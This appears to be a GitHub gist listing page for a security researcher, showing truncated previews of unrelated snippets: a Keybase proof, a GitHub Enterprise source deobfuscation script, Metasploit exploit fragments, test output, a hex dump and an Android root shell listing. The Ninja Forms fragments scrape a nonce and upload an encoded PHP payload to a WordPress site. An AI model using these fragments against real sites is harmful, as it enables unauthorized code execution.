wchen-r7

### Keybase proof

I hereby claim:

  * I am wchen-r7 on github.
  * I am wchenr7 (https://keybase.io/wchenr7) on keybase.
  * I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D  1942 8048 8089 2F97 A3F7

To claim this, I am signing this object:

wchen-r7

#!/usr/bin/ruby
#
# This tool is only used to "decrypt" the github enterprise source code.
#
# Run in the /data directory of the instance.

require "zlib"
require "byebug"

KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+

wchen-r7

donkeu

wchen-r7

  def fetch_ninja_form_nonce
    uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    puts res.body

    fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200
    res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]

wchen-r7

  def generate_mime_message(payload_name, nonce)
    puts "--- You have nonce: #{nonce.inspect}"
    data = Rex::MIME::Message.new
    data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
    data.add_part(nonce, nil, nil, 'form-data; name="security"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
    data
  end

wchen-r7

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

load "./lib/msf/core/exploit/exe.rb"

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

wchen-r7

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <title>Magento Downloader</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="icon"/>
    <link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="shortcut icon"/>
    <script type="text/javascript" src="js/prototype.js"></script>

wchen-r7

$ rake cucumber spec coverage DATABASE_ADAPTER=sqlite3
/Users/wchen/.rvm/rubies/ruby-2.1.6/bin/ruby -S bundle exec cucumber features --format Fivemat
'derives' shared examples' attribute_type method ............ (23.01s)
validates keyword argument .......... (17.46s)

7 scenarios (7 passed)
22 steps (22 passed)
0m40.481s
Coverage report generated for 'derives' shared examples' :validates keyword argument With `validates: false`, 'derives' shared examples' :validates keyword argument With `validates: true`, 'derives' shared examples' :validates keyword argument Without `:validates` keyword argument, 'derives' shared examples' attribute_type method With `:datetime` for attribute_type, 'derives' shared examples' attribute_type method With `:string` for attribute_type, 'derives' shared examples' attribute_type method With `:text` for attribute_type, 'derives' shared examples' attribute_type method Without `:datetime`, `:string`, or `:text` for attribute_type, Cucumber Features, RSpec to /Users/wchen/rapid7/metasp

wchen-r7

01b4766c 8c f5 4e 00 00 00 00 00 00 00 00 00 d4 75  ..N..........u
01b4767a b4 01 e4 75 b4 01 00 00 00 00 b0 d9 12 00  ...u..........
01b47688 ff ff ff ff ff ff ff ff 00 00 00 00 00 00  ..............
01b47696 00 00 68 dc 78 01 88 d5 78 01 88 d5 78 01  ..h.x...x...x.
01b476a4 01 00 00 00 d8 2f 12 00 70 84 51 00 70 84  ...../..p.Q.p.
01b476b2 51 00 70 84 51 00 70 84 51 00 70 84 51 00  Q.p.Q.p.Q.p.Q.
01b476c0 70 84 51 00 70 84 51 00 70 84 51 00 00 00  p.Q.p.Q.p.Q...
01b476ce 00 00 00 00 00 00 70 84 51 00 70 84 51 00  ......p.Q.p.Q.
01b476dc 70 84 51 00 70 84 51 00 70 84 51 00 70 84  p.Q.p.Q.p.Q.p.
01b476ea 51 00 70 84 51 00 38 d5 78 01 c8 d6 78 01  Q.p.Q.8.x...x.

wchen-r7

root@generic:/data/data/com.ilegendsoft.mercury # pwd
/data/data/com.ilegendsoft.mercury
root@generic:/data/data/com.ilegendsoft.mercury # ls -R                        

.:
app_webview
cache
code_cache
databases
files